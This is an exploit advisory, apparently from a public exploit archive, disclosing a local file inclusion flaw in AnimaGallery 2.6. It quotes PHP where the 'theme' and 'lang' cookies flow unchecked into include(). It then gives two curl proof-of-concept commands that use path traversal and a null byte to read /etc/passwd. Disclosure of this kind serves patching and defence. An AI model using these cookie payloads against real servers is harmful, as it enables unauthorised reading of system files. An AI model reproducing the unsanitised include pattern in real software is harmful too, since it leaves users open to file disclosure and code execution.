# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability # Date: 2015/06/07 # Vendor Homepage: http://dg.no.sapo.pt/ # Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip # Version: 2.6 # Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps * Description func.php line 21 - 22: include('themes/'.$THEME.'/templates.php'); include('languages/'.$LANG.'.php'); $lang and $THEME parameter from import_theme_lang() function. function import_theme_lang() { $THEME = DEFAULT_THEME; if(isset($_COOKIE['theme']) AND !THEME_LOCKED) $THEME = $_COOKIE['theme']; <-- Not Taint Checking $LANG = DEFAULT_LANG; if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED) $LANG = $_COOKIE['lang']; <--- Not Taint Checking return(array($THEME, $LANG)); } * Proof of Concept curl "" --cookie "lang=../../../../../../../etc/passwd%00" curl "" --cookie "theme=../../../../../../../etc/passwd%00"